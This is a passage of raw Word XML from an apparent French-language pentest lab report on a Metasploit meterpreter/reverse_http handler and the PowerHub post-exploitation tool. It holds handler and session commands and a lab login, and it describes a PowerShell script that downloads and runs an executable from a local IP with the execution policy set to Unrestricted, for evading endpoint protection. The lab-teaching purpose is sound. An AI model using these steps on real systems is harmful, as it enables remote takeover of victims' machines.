      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC0E7D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC0E7D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC0E7D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>reverse_http</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC0E7D">
        <w:t xml:space="preserve">", qui permettra à l'attaquant d'obtenir un accès à distance à la session de la victime en utilisant un canal de communication HTTP renversé. Le but est de télécharger un </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC0E7D">
        <w:t>shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC0E7D">
        <w:t xml:space="preserve"> interactif sur la cible, permettant à l'attaquant de contrôler le système cible à distance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC4C9AA" w14:textId="7A63640A" w:rsidR="00DC0E7D" w:rsidRDefault="00DC0E7D" w:rsidP="00B707AB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DC0E7D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>set</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DC0E7D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC0E7D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ReverseListenerBindAddress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC0E7D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> localhost</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t> :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5201BDA8" w14:textId="4275B52F" w:rsidR="00DC0E7D" w:rsidRDefault="00DC0E7D" w:rsidP="00B707AB">
      <w:r w:rsidRPr="00DC0E7D">
        <w:t xml:space="preserve">Cette commande définit l'adresse d'écoute pour le canal de communication renversé. La valeur "localhost" signifie que le canal de communication sera écouté sur la même machine que l'attaquant, ce qui signifie que le </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC0E7D">
        <w:t>shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC0E7D">
        <w:t xml:space="preserve"> interactif téléchargé sur la cible se connectera à l'attaquant via localhost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B4AD55" w14:textId="51EE9E73" w:rsidR="00DC0E7D" w:rsidRPr="00DC0E7D" w:rsidRDefault="00DC0E7D" w:rsidP="00B707AB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC0E7D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29645B00" w14:textId="0124E61C" w:rsidR="00DC0E7D" w:rsidRDefault="00DC0E7D" w:rsidP="00B707AB">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DC0E7D">
        <w:t>pour</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DC0E7D">
        <w:t xml:space="preserve"> accéder à des informations ou des ressources protégées ou pour contrôler un système cible</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42991E1D" w14:textId="327E8B12" w:rsidR="001A2F01" w:rsidRDefault="00DC0E7D" w:rsidP="001A2F01">
      <w:r>
        <w:t>-une fois l</w:t>
      </w:r>
      <w:r w:rsidR="001A2F01">
        <w:t xml:space="preserve">a personne cible </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001A2F01">
        <w:t>execute</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001A2F01">
        <w:t xml:space="preserve"> le fichier </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001A2F01">
        <w:t>executable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001A2F01">
        <w:t xml:space="preserve"> on va </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001A2F01">
        <w:t>recuperer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001A2F01">
        <w:t xml:space="preserve"> une session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA9F20E" w14:textId="5D401DEA" w:rsidR="001A2F01" w:rsidRDefault="001A2F01" w:rsidP="001A2F01">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Et pour afficher les sessions disponible on va lancer la commande </w:t>
      </w:r>
      <w:r w:rsidRPr="001A2F01">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC87F75" w14:textId="0CF1475B" w:rsidR="001A2F01" w:rsidRDefault="001A2F01" w:rsidP="001A2F01">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>et</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> pour faire des interactions avec les utilisateur ciblé il faut lancer la commande </w:t>
      </w:r>
      <w:r w:rsidRPr="001A2F01">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">sessions -i [id </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001A2F01">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>recuperer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001A2F01">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> de utilisateur cible]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4B279B" w14:textId="213B2BF8" w:rsidR="00D30D4D" w:rsidRDefault="00D30D4D" w:rsidP="00596A4A">
      <w:pPr>
        <w:pStyle w:val="Titre"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76128795" w14:textId="09F2E38B" w:rsidR="00D30D4D" w:rsidRDefault="00D30D4D" w:rsidP="00596A4A">
      <w:pPr>
        <w:pStyle w:val="Titre"/>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D30D4D">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>powerhub</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00596A4A">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461012D4" w14:textId="77777777" w:rsidR="00596A4A" w:rsidRPr="00596A4A" w:rsidRDefault="00596A4A" w:rsidP="00596A4A"/>
    <w:p w14:paraId="79761AE9" w14:textId="71F76D42" w:rsidR="00D30D4D" w:rsidRDefault="00D30D4D" w:rsidP="00C1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fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D30D4D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>outil</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D30D4D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> de post-exploitation pratique pour PowerShell qui aide un pentester à</w:t>
      </w:r>
      <w:r w:rsidR="00C169D1">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D30D4D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>transférer des données, en particulier du code qui peut être signalé par la protection des terminaux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C277FA7" w14:textId="5258FB1D" w:rsidR="004175C3" w:rsidRDefault="004175C3" w:rsidP="00C1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fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B25DF1C" w14:textId="68613A27" w:rsidR="004175C3" w:rsidRDefault="004175C3" w:rsidP="004175C3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Terminal :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7500E02D" w14:textId="4E79C4FD" w:rsidR="002142C8" w:rsidRDefault="002142C8" w:rsidP="004175C3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30870BB3" wp14:editId="6827BC64">
            <wp:extent cx="5760720" cy="31496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a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="3149600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5729DF16" w14:textId="3FF677CD" w:rsidR="002142C8" w:rsidRDefault="002142C8" w:rsidP="004175C3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10C05CE8" wp14:editId="4A9AF581">
            <wp:extent cx="5760720" cy="51168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a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="5116830"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="032F12F2" w14:textId="77777777" w:rsidR="002142C8" w:rsidRDefault="002142C8" w:rsidP="004175C3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CD38D26" w14:textId="1843B9CF" w:rsidR="004175C3" w:rsidRDefault="00596A4A" w:rsidP="004175C3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">On va </w:t>
      </w:r>
      <w:r w:rsidR="00C40B2C">
        <w:t>s’authentifier</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00C40B2C">
        <w:t xml:space="preserve">en tant que </w:t>
      </w:r>
      <w:r w:rsidR="00C40B2C" w:rsidRPr="00C40B2C">
        <w:rPr>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00C40B2C" w:rsidRPr="00C40B2C">
        <w:rPr>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t> :</w:t>
      </w:r>
      <w:r w:rsidR="00C40B2C">
        <w:rPr>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C40B2C" w:rsidRPr="00C40B2C">
        <w:rPr>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>powerhub</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C40B2C" w:rsidRPr="00C40B2C">
        <w:rPr>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C40B2C">
        <w:t xml:space="preserve">et </w:t>
      </w:r>
      <w:r w:rsidR="00C40B2C" w:rsidRPr="00C40B2C">
        <w:rPr>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>mot de passe : 1234</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3471344E" w14:textId="75F05692" w:rsidR="00C40B2C" w:rsidRPr="00C40B2C" w:rsidRDefault="00C40B2C" w:rsidP="00C40B2C">
      <w:r w:rsidRPr="00C40B2C">
        <w:t>Et récupérer l’adresse IP de notre réseau</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B12FD8" w14:textId="79852850" w:rsidR="004175C3" w:rsidRDefault="004175C3" w:rsidP="00C1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fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="046883C5" w14:textId="7045A1B0" w:rsidR="004175C3" w:rsidRDefault="004175C3" w:rsidP="00C1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fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47B11BC3" wp14:editId="1D6A8BC8">
            <wp:extent cx="5760720" cy="14103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5760720" cy="1410335"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A58D0C7" w14:textId="1FC0F0E1" w:rsidR="00C40B2C" w:rsidRDefault="00C40B2C" w:rsidP="00C1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472C4" w:themeColor="accent1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Apres l’exécution de la commande, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>powerhub</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> va générer </w:t>
      </w:r>
      <w:r w:rsidRPr="00C40B2C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> adresse </w:t>
      </w:r>
      <w:r w:rsidRPr="00C40B2C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> pour se connecter à l’interface de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C40B2C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>powerhub</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="278F7E7D" w14:textId="2751F871" w:rsidR="00C40B2C" w:rsidRDefault="00C40B2C" w:rsidP="00C1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fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C40B2C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Les entrées de journal indiquent également que l'application est en cours d'exécution sur un système Linux et que l'interface web peut être accessible via </w:t>
      </w:r>
      <w:r w:rsidRPr="00C40B2C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00C40B2C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> ou </w:t>
      </w:r>
      <w:r w:rsidRPr="00C40B2C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>HTTPS</w:t>
      </w:r>
      <w:r w:rsidRPr="00C40B2C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> aux adresses IP et aux ports spécifiés</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674C3067" w14:textId="70E9C458" w:rsidR="00596A4A" w:rsidRDefault="00596A4A" w:rsidP="00C1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fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="531E5782" w14:textId="77777777" w:rsidR="00596A4A" w:rsidRPr="00D30D4D" w:rsidRDefault="00596A4A" w:rsidP="00C1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fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F03C09F" w14:textId="3FD02451" w:rsidR="00D30D4D" w:rsidRDefault="00C40B2C" w:rsidP="001A2F01">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5625BA7A" wp14:editId="374BC15B">
            <wp:extent cx="5760720" cy="2895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p>
    <w:p w14:paraId="2F0E014F" w14:textId="73CCFBB9" w:rsidR="00C40B2C" w:rsidRDefault="00C40B2C" w:rsidP="001A2F01">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="204D61C0" wp14:editId="3EFC4506">
            <wp:extent cx="5760720" cy="31248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inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7808B2B3" w14:textId="6DEF6491" w:rsidR="00081F5D" w:rsidRPr="00081F5D" w:rsidRDefault="00081F5D" w:rsidP="00081F5D">
      <w:pPr>
        <w:pStyle w:val="PrformatHTML"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00081F5D">
        <w:rPr>
          <w:rStyle w:val="y2iqfc"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Le script </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="y2iqfc"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>si dessous</w:t>
      </w:r>
      <w:r w:rsidRPr="00081F5D">
        <w:rPr>
          <w:rStyle w:val="y2iqfc"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> télécharge un fichier à partir d'une </w:t>
      </w:r>
      <w:r w:rsidRPr="00081F5D">
        <w:rPr>
          <w:rStyle w:val="y2iqfc"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="y2iqfc"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(http://192.168.25.54/test.exe)</w:t>
      </w:r>
      <w:r w:rsidRPr="00081F5D">
        <w:rPr>
          <w:rStyle w:val="y2iqfc"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> à l'aide de l'applet de commande </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00081F5D">
        <w:rPr>
          <w:rStyle w:val="y2iqfc"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Invoke-WebRequest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00081F5D">
        <w:rPr>
          <w:rStyle w:val="y2iqfc"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">, enregistre le contenu du fichier dans </w:t>
      </w:r>
      <w:r w:rsidRPr="00081F5D">
        <w:rPr>
          <w:rStyle w:val="y2iqfc"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>C:\PowerHub.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00081F5D">
        <w:rPr>
          <w:rStyle w:val="y2iqfc"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">, définit la stratégie d'exécution sur </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00081F5D">
        <w:rPr>
          <w:rStyle w:val="y2iqfc"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Unrestricted</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="y2iqfc"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>(permet de lancer tous les script sons restriction)</w:t>
      </w:r>
      <w:r w:rsidRPr="00081F5D">
        <w:rPr>
          <w:rStyle w:val="y2iqfc"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> et exécute enfin le fichier </w:t>
      </w:r>
      <w:r w:rsidRPr="00081F5D">
        <w:rPr>
          <w:rStyle w:val="y2iqfc"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PowerHub.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E1D17C" w14:textId="77777777" w:rsidR="00081F5D" w:rsidRDefault="00081F5D" w:rsidP="001A2F01">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5282907B" w14:textId="13F20B49" w:rsidR="00C40B2C" w:rsidRDefault="00C40B2C" w:rsidP="001A2F01">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1CE77E69" wp14:editId="7FB6F713">
            <wp:extent cx="5760720" cy="17475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1747520"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
